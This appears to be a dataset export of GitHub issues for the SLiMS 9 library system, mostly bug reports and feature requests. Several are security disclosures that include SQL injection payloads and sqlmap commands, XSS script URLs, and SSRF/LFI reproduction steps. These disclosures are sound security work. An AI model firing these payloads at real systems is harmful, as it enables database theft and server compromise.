issue_owner_repo
sequencelengths
2
2
issue_body
stringlengths
0
261k
issue_title
stringlengths
1
925
issue_comments_url
stringlengths
56
81
issue_comments_count
int64
0
2.5k
issue_created_at
stringlengths
20
20
issue_updated_at
stringlengths
20
20
issue_html_url
stringlengths
37
62
issue_github_id
int64
387k
2.46B
issue_number
int64
1
127k
[ "slims", "slims9_bulian" ]
# The bug A Server Side Request Forgery exists in `admin/modules/bibliography/pop_p2p.php` at the code below ```php $detail_uri = $_GET['uri'] . "/index.php?p=show_detail&inXML=true&id=" . $_GET['biblioID']; // parse XML $data = modsXMLsenayan($detail_uri, 'uri'); ``` # To Reproduce **Steps to reproduce the behavior:** 1. Login as admin or user that has access to bibliography 2. set up netcat to listen to a specific port (example: 7878) 3. go to the `/admin/modules/bibliography/pop_p2p.php?uri=http://LOCALHOST_OR_LISTENER_IP:7878` 4. the netcat should receive a request # Screenshots ### proof-of-concept using pipedream <img width="1439" alt="image-ssrf-2" src="https://github.com/slims/slims9_bulian/assets/116742485/016f1312-e5ed-4449-b882-280bef3a86b6"> ### proof-of-concept using netcat <img width="1438" alt="image-ssrf-1" src="https://github.com/slims/slims9_bulian/assets/116742485/b3103157-580d-4960-9e2c-3f484b203f83"> # versions - Browser: Google Chrome | 115.0.5790.114 (Official Build) (x86_64) Slims Version: slims9_bulian-9.6.1
[Security Bugs] Server Side Request Forgery at pop_p2p.php
https://api.github.com/repos/slims/slims9_bulian/issues/204/comments
2
2023-08-17T17:57:57Z
2023-08-30T07:30:34Z
https://github.com/slims/slims9_bulian/issues/204
1,855,462,115
204
[ "slims", "slims9_bulian" ]
**Describe the bug** The bug exists on the "Bibliography" module on the admin page. Any fields other than "Publisher", "Publishing Place", and "Classification" can be filled with text. But these 3 mentioned columns cannot be filled, as they pop up and search for an entry from the master file. These columns will keep searching, therefore no data can be inserted. There are screenshots down below, after the steps to reproduce. (This issue happens on a hosted site) **To Reproduce** Steps to reproduce the behavior: 1. Go to Bibliography (admin) 2. Click on Add new Bibliography 3. Scroll down to "Publisher" (to fill data) 4. See error **Expected behavior** These boxes should show the available names from master file, or show the option to add the name if the typed name doesn't exist. **Screenshots** This is how it looks like: ![image](https://github.com/slims/slims9_bulian/assets/92841816/0e3dba56-1040-4861-a780-1a8aa6e66294) The keyword "Calvin" exists in the master file, therefore it should have been like this: ![image](https://github.com/slims/slims9_bulian/assets/92841816/8f0d1cf6-5c91-49b0-bfeb-0dc7c770f36e) (The expected image is tested from another hosting site, but the hosting site used where the bugs exist, other people there who use slims don't have this issue). **Desktop (please complete the following information):** - OS: Linux isv02-sh-salak.idcloudhosting.com 3.10.0-962.3.2.lve1.5.76.el7.x86_64 - Browser: Tested with Firefox and Chrome - Version Slims v.9.6.1 **Additional context** Add any other context about the problem here.
Bibliography Module: Publisher, Publishing Place, and Classification can't be filled.
https://api.github.com/repos/slims/slims9_bulian/issues/203/comments
1
2023-08-06T16:41:15Z
2023-08-29T13:24:25Z
https://github.com/slims/slims9_bulian/issues/203
1,838,271,758
203
[ "slims", "slims9_bulian" ]
<p>config\mail.php<br /> &lt;?php<br /> return [<br /> &nbsp; &nbsp; &#39;debug&#39; =&gt; &#39;2&#39;,<br /> &nbsp; &nbsp; &#39;SMTPSecure&#39; =&gt; &#39;ssl&#39;,<br /> &nbsp; &nbsp; &#39;enable&#39; =&gt; true,<br /> &nbsp; &nbsp; &#39;server&#39; =&gt; &#39;imap.gmail.com&#39;,<br /> &nbsp; &nbsp; &#39;server_port&#39; =&gt; &#39;465&#39;,<br /> &nbsp; &nbsp; &#39;auth_enable&#39; =&gt; true,<br /> &nbsp; &nbsp; &#39;auth_username&#39; =&gt; &#39;[email protected]&#39;, // example : [email protected]<br /> &nbsp; &nbsp; &#39;auth_password&#39; =&gt; &#39;auth_password&#39;,<br /> &nbsp; &nbsp; /**<br /> &nbsp; &nbsp; &nbsp;* E-Mail information<br /> &nbsp; &nbsp; &nbsp;*/<br /> &nbsp; &nbsp; &#39;from&#39; =&gt; &#39;[email protected]&#39;, // example [email protected]<br /> &nbsp; &nbsp; &#39;from_name&#39; =&gt; &#39;library&#39;, // put a nice name here<br /> &nbsp; &nbsp; &#39;reply_to&#39; =&gt; &#39;[email protected]&#39;, // similar with &#39;from&#39; option<br /> &nbsp; &nbsp; &#39;reply_to_name&#39; =&gt; &#39;library&#39;, // similar with &#39;from&#39; option<br /> ];</p> <p>2023-07-26 02:28:58 CLIENT -&gt; SERVER: AUTH LOGIN<br /> 2023-07-26 02:28:59 SERVER -&gt; CLIENT: 334 VXNlcm5hbWU6<br /> 2023-07-26 02:28:59 CLIENT -&gt; SERVER: [credentials hidden]<br /> 2023-07-26 02:28:59 SERVER -&gt; CLIENT: 334 UGFzc3dvcmQ6<br /> 2023-07-26 02:28:59 CLIENT -&gt; SERVER: [credentials hidden]<br /> 2023-07-26 02:28:59 SERVER -&gt; CLIENT: 235 2.7.0 Accepted<br /> 2023-07-26 02:28:59 CLIENT -&gt; SERVER: MAIL FROM:&lt;[email protected]&gt;<br /> 2023-07-26 02:28:59 SERVER -&gt; CLIENT: 250 2.1.0 OK y17-20020a17090322d100b001ae0152d280sm11759378plg.193 - gsmtp<br /> 2023-07-26 02:28:59 CLIENT -&gt; SERVER: RCPT TO:&lt;[email protected]&gt;<br /> 2023-07-26 02:28:59 SERVER -&gt; CLIENT: 250 2.1.5 OK y17-20020a17090322d100b001ae0152d280sm11759378plg.193 - gsmtp<br /> 2023-07-26 02:28:59 CLIENT -&gt; SERVER: DATA<br /> 2023-07-26 02:29:00 SERVER -&gt; CLIENT: 354 Go ahead y17-20020a17090322d100b001ae0152d280sm11759378plg.193 - gsmtp<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: Date: Wed, 26 Jul 2023 10:28:58 +0800<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: To: =?iso-8859-1?B?6I2J6bih54KW6bG8?= &lt;[email protected]&gt;<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: From: library &lt;[email protected]&gt;<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: Reply-To: library &lt;[email protected]&gt;<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: Subject: Overdue Notice for Member ([email protected])<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: Message-ID: &lt;hD4ClaJjuQLAuz4Dtfhsd4VaT3hklAq86cLXBTjUH6E@localhost&gt;<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: X-Mailer: PHPMailer 6.1.8 (https://github.com/PHPMailer/PHPMailer)<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: MIME-Version: 1.0<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: Content-Type: multipart/alternative;<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: boundary=&quot;b1_hD4ClaJjuQLAuz4Dtfhsd4VaT3hklAq86cLXBTjUH6E&quot;<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: Content-Transfer-Encoding: 8bit<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER:<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: This is a multi-part message in MIME format.<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER:<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: --b1_hD4ClaJjuQLAuz4Dtfhsd4VaT3hklAq86cLXBTjUH6E<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: Content-Type: text/plain; charset=iso-8859-1<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER: Content-Transfer-Encoding: 8bit<br /> 2023-07-26 02:29:00 CLIENT -&gt; SERVER:&nbsp;</p> <p>////////////////////////////////////////////</p> <p><img alt="" src="https://onedrive.live.com/embed?resid=37910A566710EB09%2167406&amp;authkey=%21AIajywqd-X4nDYg&amp;width=999999&amp;height=660" /> **** <br><br><p>Question:<br /> Which part can i change the -- &nbsp;library &lt;[email protected]&gt; to &lt;[email protected]&gt;</p> <p>I have searched around a few files, hoping to find some clues for it in the following locations:</p> <p>1. admin\modules\reporting\customs\overdued_list.php<br /> 2. admin\modules\membership\member_base_lib.inc.php<br /> 3. admin\admin_template\overdueMail.php</p> <p>Some words cannot display correctly, which is another issue similar to #96. My font is for &quot;Chinese characters&quot; in the email. This part will be fixed if I do not call out the {$loadData} in&nbsp;</p> <p>admin\admin_template\overdueMail.php</p> <p><br /> line:119&nbsp;&nbsp; &nbsp; &lt;table style=&quot;display: block&quot;&gt;<br /> line:120 &nbsp;&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;{$loanData} &nbsp;&nbsp; &nbsp;//Remove this one, temperary use another way to remind the overdue member,<br /> line:121 &nbsp; &nbsp; &nbsp; &nbsp; &lt;/table&gt;</p> <p>This should resolve the font error.</p>
Overdue notification: Sender Email library <[email protected]> to <[email protected]>
https://api.github.com/repos/slims/slims9_bulian/issues/201/comments
2
2023-07-26T02:09:11Z
2023-08-19T01:21:29Z
https://github.com/slims/slims9_bulian/issues/201
1,821,452,862
201
[ "slims", "slims9_bulian" ]
**Describe the bug** System keep reporting "Can't load MARC Source" when using the cataloguing servers **To Reproduce** Steps to reproduce the behavior: 1. Go to 'Biblography' 2. Click on 'Marc SRU or z3950' 3. enter a subject in the search field and click on search '....' 4. See error **Expected behavior** Its supposed to load results from the cataloguing server, which it does on localhost systems, but fails on web servers
Can't load MARC Source on remote instance
https://api.github.com/repos/slims/slims9_bulian/issues/200/comments
8
2023-07-25T21:11:03Z
2024-08-02T02:24:22Z
https://github.com/slims/slims9_bulian/issues/200
1,821,159,578
200
[ "slims", "slims9_bulian" ]
Currently there is no way to to manage branch and branch based user's role along with contents. The idea is: One Branch users can see others content but can't update/delete any other branch or Main Library bibliography. But for same title entry by any branch previously, another branch can add/modify new items only. Other branch can add new bibliography also. The same applies for members too. Users can search like current system and see the location of each items. This is very important for large institutions having branches.
Branch based user and content management
https://api.github.com/repos/slims/slims9_bulian/issues/199/comments
1
2023-07-25T16:24:24Z
2023-12-19T10:08:01Z
https://github.com/slims/slims9_bulian/issues/199
1,820,696,246
199
[ "slims", "slims9_bulian" ]
**Is your feature request related to a problem? Please describe.** There should be a change of password or forgot password feature for the members area.
Change of Password and forgot password feature for Members Area
https://api.github.com/repos/slims/slims9_bulian/issues/198/comments
0
2023-07-22T09:06:20Z
2023-07-22T09:06:20Z
https://github.com/slims/slims9_bulian/issues/198
1,816,692,228
198
[ "slims", "slims9_bulian" ]
**Is your feature request related to a problem? Please describe.** I believe a classification using Library of Congress classification is also need. Currently we have only Dewey classification reports in the reporting module.
Library of Congress Classification Report
https://api.github.com/repos/slims/slims9_bulian/issues/197/comments
0
2023-07-22T08:55:39Z
2023-07-22T08:55:39Z
https://github.com/slims/slims9_bulian/issues/197
1,816,689,250
197
[ "slims", "slims9_bulian" ]
**Describe the bug** Change template/default/tinfo.inc.php to display many books instead of 6 default. ``` $sysconf['template']['classic_popular_collection'] = 1; $sysconf['template']['classic_popular_collection_item'] = 6; // change to 12 doesn't work $sysconf['template']['classic_new_collection'] = 1; $sysconf['template']['classic_new_collection_item'] = 6; // change to 12 doesn't work ``` I cannot change the quantity of books in home page. Theme Default. How can I change this behaviour?
Quality of books on home page (default theme) cannot change?
https://api.github.com/repos/slims/slims9_bulian/issues/196/comments
2
2023-07-13T10:59:19Z
2023-08-19T00:29:15Z
https://github.com/slims/slims9_bulian/issues/196
1,802,767,321
196
[ "slims", "slims9_bulian" ]
Hi, Excuse me, but I don't see any area where to report security issues, given the history of other users, I will put it here, but it would be highly advisable that you quickly fix the vulnerability and/or put this issues in private format until corrected. **Description** The current version of SLiMS 9.6.0 presents a high/critical vulnerability, since it allows an authenticated user with access to the "scrape_image.php" file to send requests to internal services or load the content of very relevant internal files (system files, configuration files, backup, SSH keys, etc...) over the "imageURL" parameter. **Proof of Concept:** The following illustration shows how the malicious user can manage to load the contents of the "index.html" file of the internal web server on port 80 (port not exposed externally), showing that the attacker would not only manage to find out internal services, but could extract the information in image format encoded in base64. <img width="852" alt="SLiMS 9 6 0 - ssrf - 2" src="https://github.com/slims/slims9_bulian/assets/54067582/b52c8ff8-b458-4adb-9be7-03e6b5f92267"> In addition, this can allow to reach relevant files of the website, in this case it has been used to extract a backup of the site's database. <img width="854" alt="SLiMS 9 6 0 - ssrf - 4" src="https://github.com/slims/slims9_bulian/assets/54067582/cfbb8499-aae5-4dc9-a674-6f5ab449db89"> Finally, the vulnerability has been used to reach an internal file of the machine, this could be used to reach other files where SSH credentials or keys are exposed, gaining illegitimate access to the server and compromising the machine. <img width="852" alt="SLiMS 9 6 0 - ssrf - 5" src="https://github.com/slims/slims9_bulian/assets/54067582/355af964-7807-41ba-99d7-de9869336a51"> **Expected behavior** The application should only load files with image format (png, gif, jpg, etc...) and from a specific path of the application, preventing the path to be altered arbitrarily and from the client side. In addition, it should be prevented from loading to internal paths or external servers not allowed by the application and/or organization, thus preventing it from being possible to identify and reach internal resources or reach malicious external sources to load malicious code. Best regards,
SLiMS 9.6.0 - Server-Side Request Forguery (SSRF) & Local File Inclusion (LFI)
https://api.github.com/repos/slims/slims9_bulian/issues/194/comments
2
2023-07-07T17:09:07Z
2023-07-26T10:53:32Z
https://github.com/slims/slims9_bulian/issues/194
1,793,872,049
194
[ "slims", "slims9_bulian" ]
**Describe the bug** When access page Download Counter in Admin Dashboard => Reporting => Download Counter (file /admin/modules/reporting/customs/dl_counter.php) it shows "Uknown error". I try to check PHP error logs but no information. How can I debug this?
SLiMs 9.6.0 Download Counter display "Uknown error"
https://api.github.com/repos/slims/slims9_bulian/issues/193/comments
3
2023-06-22T08:07:10Z
2024-06-04T07:56:03Z
https://github.com/slims/slims9_bulian/issues/193
1,769,169,181
193
[ "slims", "slims9_bulian" ]
Mohon solusi, saya coba install di xampp untuk source code slims9 berhasil dan bisa login sebagai admin. tapi ketika coba diinstall dihostingan, proses instalasi berhasil namun pas coba login admin muncul pesan "You are not authorized to view this section"....
Gagal Login Admin setelah berhasil install muncul pesan "You are not authorized to view this section"
https://api.github.com/repos/slims/slims9_bulian/issues/190/comments
1
2023-05-13T08:14:42Z
2024-01-06T16:02:14Z
https://github.com/slims/slims9_bulian/issues/190
1,708,513,280
190
[ "slims", "slims9_bulian" ]
hai, adakah yang memiliki masalah yang sama dan tahu solusinyaa kah? saya ketika instal proses checking awal semuanya ceklis dan tidak ada masalah tapi ketika finishing akhir memasukan user admin dan password muncul notif seperti ini : TRIGGER command denied to user 'perpus4'@'10.3.33.11' for table 'loan' TRIGGER command denied to user 'perpus4'@'10.3.33.11' for table 'loan' TRIGGER command denied to user 'perpus4'@'10.3.33.11' for table 'loan' sebanyak tiga baris. ![ask4](https://github.com/slims/slims9_bulian/assets/133189341/352e0f56-1e74-4a2e-b03a-3460caa77009)
Gagal Instalasi Akhir Ketika Setting Admin dan Password
https://api.github.com/repos/slims/slims9_bulian/issues/187/comments
2
2023-05-11T06:54:05Z
2023-05-12T18:56:26Z
https://github.com/slims/slims9_bulian/issues/187
1,705,185,962
187
[ "slims", "slims9_bulian" ]
**Describe the bug** When a user uploads an image in "SLiMS 9 Bulian official source code", the uploaded image’s EXIF Geolocation Data does not gets stripped. As a result, anyone can get sensitive information of "SLiMS 9 Bulian official source code" users like their Geolocation, their Device information like Device Name, Version, Software & Software version used etc. **CMS Version:** v9.5.2 **Affected URL:** http://127.0.0.1/bulian/admin/index.php?mod=membership **To Reproduce** Steps to reproduce the behavior: 1) Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg) 2) There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s . login your admin panel and membership menu and upload photo in any member profile. 3) see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html ) 4) open it (https://www.verexif.com/en/index.php) 5) See whether is that still showing exif data , if it is then Report it. **Proof Of Concept:** You can see the Proof of Concept. which I've attached screenshots and video to confirm the vulnerability. **Screenshots** ![screenshot1](https://user-images.githubusercontent.com/41516016/229643111-faa0574b-9aa0-4b03-a0d0-da0f7f18e3a1.png) ![screenshot2](https://user-images.githubusercontent.com/41516016/229643122-6698a566-4d72-4b66-b5c5-ede2aedf76d4.png) ![screenshot_2](https://user-images.githubusercontent.com/41516016/229643136-7eefeefc-0bb8-4797-9a2a-5a707157152b.png) ![screenshot3](https://user-images.githubusercontent.com/41516016/229643152-df7cbe53-8070-4735-ba9e-3707f6b3f5a2.png) **Video** https://user-images.githubusercontent.com/41516016/229643735-dd78ced5-558d-4817-a6a9-9d34099223d0.mp4 **Desktop (please complete the following information):** - OS: Windows 10 - Browser: Google Chrome - **Impact** This vulnerability is CRITICAL and impacts all the "SLiMS 9 Bulian official source code" customer base. This vulnerability violates the privacy of a User and shares sensitive information of the user who uploads an image on SLiMS 9 Bulian official. Let me know if any further info is required. Thanks & Regards **Rahad Chowdhury** Cyber Security Specialist https://www.linkedin.com/in/rahadchowdhury
EXIF Geolocation Data Not Stripped From Uploaded Images
https://api.github.com/repos/slims/slims9_bulian/issues/186/comments
0
2023-04-03T22:54:16Z
2023-08-27T07:51:24Z
https://github.com/slims/slims9_bulian/issues/186
1,652,878,969
186
[ "slims", "slims9_bulian" ]
**Ketemu celah potensi injection (melalui XSS) dengan kode:** `/index.php/'"--><script>alert('gembel')</script></index.php?p=profil-singkat` Hasilnya adalah pop-up alert. Silakan diperiksa.
XSS Injection
https://api.github.com/repos/slims/slims9_bulian/issues/185/comments
1
2023-03-13T04:31:02Z
2023-03-13T08:34:59Z
https://github.com/slims/slims9_bulian/issues/185
1,620,733,457
185
[ "slims", "slims9_bulian" ]
Ketika tombol Simpan Pengaturan pada halaman Pengaturan Sistem ditekan, tidak terjadi apa-apa dan tidak menyimpan seperti pada halaman lain. [![senayan.png](https://i.postimg.cc/HxkTVwdX/senayan.png)](https://postimg.cc/xkhwZbk1) Terima kasih
Tombol Simpan Pengaturan pada Halaman Pengaturan Sistem Tidak Bekerja
https://api.github.com/repos/slims/slims9_bulian/issues/184/comments
3
2023-03-01T03:20:36Z
2023-03-14T01:16:04Z
https://github.com/slims/slims9_bulian/issues/184
1,604,162,429
184
[ "slims", "slims9_bulian" ]
While importing bibliographical record from Library of Congress via z39.50, place data shows country code instead of country name. I think the table `mst_place` can be altered by adding a new column `place_code` where the codes (available at: https://www.loc.gov/marc/countries/countries_code.html) will be stored. The interface shall replace the code with name. It also may be useful to have pre-inserted the list from https://www.loc.gov/marc/countries/countries_code.html. Thank you.
Z39.50 import shows country code instead of name.
https://api.github.com/repos/slims/slims9_bulian/issues/183/comments
2
2023-02-19T05:55:25Z
2023-07-25T16:06:05Z
https://github.com/slims/slims9_bulian/issues/183
1,590,575,090
183
[ "slims", "slims9_bulian" ]
Why is there nothing showing up under Overdued list but I have books that are overdue
Overdued list
https://api.github.com/repos/slims/slims9_bulian/issues/182/comments
1
2023-02-16T18:03:40Z
2023-04-12T14:37:34Z
https://github.com/slims/slims9_bulian/issues/182
1,588,138,503
182
[ "slims", "slims9_bulian" ]
Any API docs or postman collection for SLiMS? **Is your feature request related to a problem? Please describe.** A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] **Describe the solution you'd like** A clear and concise description of what you want to happen. **Describe alternatives you've considered** A clear and concise description of any alternative solutions or features you've considered. **Additional context** Add any other context or screenshots about the feature request here.
Any API Docs
https://api.github.com/repos/slims/slims9_bulian/issues/181/comments
0
2023-01-30T04:21:45Z
2023-01-30T04:21:45Z
https://github.com/slims/slims9_bulian/issues/181
1,561,719,083
181
[ "slims", "slims9_bulian" ]
spreadsheet.php on visitor report is not working ![spreadsheet](https://user-images.githubusercontent.com/53245010/214200988-cda6377e-25c7-4e81-935a-090511c65c17.jpg) ![spreadsheet2](https://user-images.githubusercontent.com/53245010/214201010-ffdb7797-f97d-4fe4-aff7-926590cd7ec8.jpg)
spreadsheet.php
https://api.github.com/repos/slims/slims9_bulian/issues/180/comments
1
2023-01-24T02:34:31Z
2023-03-11T16:17:36Z
https://github.com/slims/slims9_bulian/issues/180
1,554,195,606
180
[ "slims", "slims9_bulian" ]
Hi, I like your project, and at the moment I only use the backend to handle book checkouts. I have this problem, both in bibliography and in item, if I search for an item I see how many I have in all, but if I have a loan in progress the quantity does not change. Is this correct or do I need to make some special settings?
Availability of books
https://api.github.com/repos/slims/slims9_bulian/issues/179/comments
1
2023-01-18T17:14:25Z
2023-01-26T15:08:57Z
https://github.com/slims/slims9_bulian/issues/179
1,538,374,945
179
[ "slims", "slims9_bulian" ]
It would be nice to add a separate page for authors with cover information and a list of his books
A separate page for the author with a cover
https://api.github.com/repos/slims/slims9_bulian/issues/178/comments
3
2023-01-04T14:23:12Z
2023-01-07T12:48:05Z
https://github.com/slims/slims9_bulian/issues/178
1,519,066,659
178
[ "slims", "slims9_bulian" ]
Unable to search Bibliographic by author name. And Circulation > load history filter by member name or ID Server specifications: - Apache 2.4 - MySQL 5.7 default storage engine MyISAM - php7.4
Slims v9.5.1 can not search Bibliographic by author name and Filter load history by member name/ID
https://api.github.com/repos/slims/slims9_bulian/issues/175/comments
1
2022-12-23T13:21:19Z
2023-03-27T13:55:43Z
https://github.com/slims/slims9_bulian/issues/175
1,509,343,913
175
[ "slims", "slims9_bulian" ]
ketika membuka halaman [example.com//index.php?p=libinfo](http://example.com/slims9/index.php?p=visitor) maka akan redirect ke halaman http://example.com/slims9/index.php Di local bisa, namun ketika di deploy ke server tidak bisa
Halaman index.php?p=visitor tidak dapat dibuka
https://api.github.com/repos/slims/slims9_bulian/issues/174/comments
1
2022-12-22T00:55:12Z
2022-12-22T10:08:42Z
https://github.com/slims/slims9_bulian/issues/174
1,507,099,755
174
[ "slims", "slims9_bulian" ]
**The bug** Unfiltered parsing from parameter `filter` from line 38-43 **To Reproduce or PoC** 1. login as admin 2. access url below and change IP_ADDRESS_HERE to your own website: `http://<IP_ADDRESS_HERE_OR_LOCALHOST>/admin/modules/reporting/customs/pop_procurement_list.php?filter=<script>alert(String.fromCharCode(120, 115, 115, 32, 98, 121, 32, 48, 120, 100, 99, 57));</script>` 3. there should be an alert that contains message `xss by 0xdc9` **Screenshots** <img width="1086" alt="Screen Shot 2022-12-22 at 01 17 50" src="https://user-images.githubusercontent.com/46653986/208967075-32f6c99a-611c-441b-bd25-5d897b250f50.png"> **Desktop (please complete the following information):** - OS: MacOS Mojave 10.14.6 - Browser: Google Chrome | 103.0.5060.134 (Official Build) (x86_64) - Slims Version: slims9_bulian-9.4.2
[Security Bug] XSS in pop_procurement_list.php
https://api.github.com/repos/slims/slims9_bulian/issues/173/comments
0
2022-12-21T17:29:44Z
2022-12-22T11:25:35Z
https://github.com/slims/slims9_bulian/issues/173
1,506,672,511
173
[ "slims", "slims9_bulian" ]
Need mobile app support for iOS and android.
Whether app support for android and iOS there
https://api.github.com/repos/slims/slims9_bulian/issues/169/comments
0
2022-11-19T08:29:09Z
2022-11-19T08:30:08Z
https://github.com/slims/slims9_bulian/issues/169
1,456,318,223
169
[ "slims", "slims9_bulian" ]
In the page http://localhost/library/install/index.php while doing a _first-time installation_ of SLiMS version 9.5.0, I found this error: `You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'json NULL, ``r`` int(1) NOT NULL default '0', ``w`` int(1) NOT NULL default '0',' at line 4 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'json NULL, ``path`` text COLLATE utf8mb4_unicode_ci NOT NULL, ``created_at`` dat' at line 3 Table 'wabioeth_library.group_access' doesn't exist` **### Server details:** - Apache/2.4.38 (Win64) OpenSSL/1.1.1b PHP/8.1.10 - Database client version: libmysql - mysqlnd 8.1.10 database engine `Server version: 10.1.38-MariaDB`
Installation error
https://api.github.com/repos/slims/slims9_bulian/issues/167/comments
4
2022-11-07T12:28:58Z
2022-11-15T12:16:09Z
https://github.com/slims/slims9_bulian/issues/167
1,438,282,906
167
[ "slims", "slims9_bulian" ]
Hello, team, on the new version of your system SLIMS-9.5.0 you have an SQLi vulnerability in the parameter keywords. PoC: ```MySQL --- Parameter: keywords (GET) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7'''))) RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)# --- ``` ## After: - - - Multiple SQLi found. ![](https://raw.githubusercontent.com/nu11secur1ty/CVE-nu11secur1ty/main/vendors/slims.web.id/SLIMS-9.5.0/docs/M-SQLi.png) BR @nu11secur1ty System Administrator - IT Infrastructure and Penetration Testing Engineer.
SQLi
https://api.github.com/repos/slims/slims9_bulian/issues/166/comments
2
2022-11-04T01:54:06Z
2022-11-09T10:10:05Z
https://github.com/slims/slims9_bulian/issues/166
1,435,442,370
166
[ "slims", "slims9_bulian" ]
Hello, team, on the new version of your system SLIMS-9.5.0 you have an SQLi vulnerability in the parameter `keywords`. PoC: ```MySQL --- Parameter: keywords (GET) Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7''')));SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment) Payload: csrf_token=a1266f4d54772e420f61cc03fe613b994f282c15271084e39c31f9267b55d50df06861&search=search&keywords=tfxgst7flvw5snn6r1b24fnyu8neev6w4v6u1uik7'''))) RLIKE (SELECT 9971 FROM (SELECT(SLEEP(5)))bdiv)# --- BR @nu11secur1ty System Administrator - IT Infrastructure and Penetration Testing Engineer.
SQLi
https://api.github.com/repos/slims/slims9_bulian/issues/165/comments
1
2022-11-03T16:35:31Z
2022-11-04T01:58:34Z
https://github.com/slims/slims9_bulian/issues/165
1,434,956,976
165
[ "slims", "slims9_bulian" ]
Ditemukan quotes dengan tampilan yang tidak sempurna di laman visitor (kemungkinan di kesalahan penulisan) ![Screenshot (1)](https://user-images.githubusercontent.com/60032856/199649900-2788a942-e9e7-4bd0-b350-bfecc1ba046b.png)
Quotes tidak menampil dengan sempurna
https://api.github.com/repos/slims/slims9_bulian/issues/164/comments
3
2022-11-03T04:52:13Z
2022-11-12T01:54:24Z
https://github.com/slims/slims9_bulian/issues/164
1,434,099,513
164
[ "slims", "slims9_bulian" ]
**Describe the bug** An unsanitized collType parameter can be used to perform bloolean base blind SQL Injection attack **To Reproduce** 1. Log in as admin 2. go to http://localhost/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=bbbb&membershipType=a&collType=aaaa 3. capture the request and save it to a file 4. use sqlmap with this command `sqlmap -r <capture_http_req >.req--level 5 --risk 3 --dbms=mysql -p collType --technique=B --current-user` **Screenshots** 1. bredel.req ![image](https://user-images.githubusercontent.com/46653986/196041082-240ad035-15df-42b3-9bc8-503d17122ca5.png) 2. sqlmap first run without getting anything from the database ![image](https://user-images.githubusercontent.com/46653986/196041133-1332aa68-75c6-4dc2-bc92-eef782a13255.png) 3. sqlmap get current user <img width="1440" alt="Screen Shot 2022-10-16 at 21 22 47" src="https://user-images.githubusercontent.com/46653986/196041256-dd9524f4-5ee9-4ca9-82d0-dca8c2867b79.png"> **Versions** - OS: Kali Linux(Debian) 2021 - Browser: Firefox 78.7.0.esr(64-bit) - Slims Version: slims9_bulian-9.4.2
[Security Bug] Boolean SQL Injection in loan_by_class.php
https://api.github.com/repos/slims/slims9_bulian/issues/163/comments
0
2022-10-16T14:33:45Z
2022-11-24T07:55:41Z
https://github.com/slims/slims9_bulian/issues/163
1,410,507,872
163
[ "slims", "slims9_bulian" ]
**Describe the bug** A Cross site scripting due to unfiltered `$_GET['filter']` **To Reproduce** Steps to reproduce the behavior: 1. Log in as Admin 2. Go to http://localhost/admin/modules/reporting/pop_chart.php?filter=2022%20%27<script>alert(%270xdc9%27);</script> 3. There should be a pop that says '0xdc9' **Screenshots** ![image](https://user-images.githubusercontent.com/46653986/196026667-f0047462-f2ee-454d-81d5-73179ceca21e.png) **Versions** - OS: Kali Linux(Debian) 2021 - Browser: Firefox 78.7.0.esr(64-bit) - Slims Version: slims9_bulian-9.4.2 **Vulnerable code** - pop_chart.php line 43-70
[Security Bug] XSS in pop_chart.php
https://api.github.com/repos/slims/slims9_bulian/issues/162/comments
0
2022-10-16T08:51:31Z
2022-11-24T07:55:09Z
https://github.com/slims/slims9_bulian/issues/162
1,410,420,838
162
[ "slims", "slims9_bulian" ]
hello I need to customize the style of themes but the style that I add to the style.css file of akasia template at the both of public and admin template does not show.
customize style
https://api.github.com/repos/slims/slims9_bulian/issues/161/comments
1
2022-09-29T07:46:33Z
2022-11-12T02:21:49Z
https://github.com/slims/slims9_bulian/issues/161
1,390,411,850
161
[ "slims", "slims9_bulian" ]
Hello community, I'm new here and just arrived to a school that works with the open source Slims 8 for their library. The thing is that the person who did this, sent me a wrong password and , so far I couldn't find any way to recover the user and pass. Can someone help me with this?
Password recover
https://api.github.com/repos/slims/slims9_bulian/issues/160/comments
1
2022-09-13T14:34:10Z
2022-10-16T14:00:34Z
https://github.com/slims/slims9_bulian/issues/160
1,371,559,447
160
[ "slims", "slims9_bulian" ]
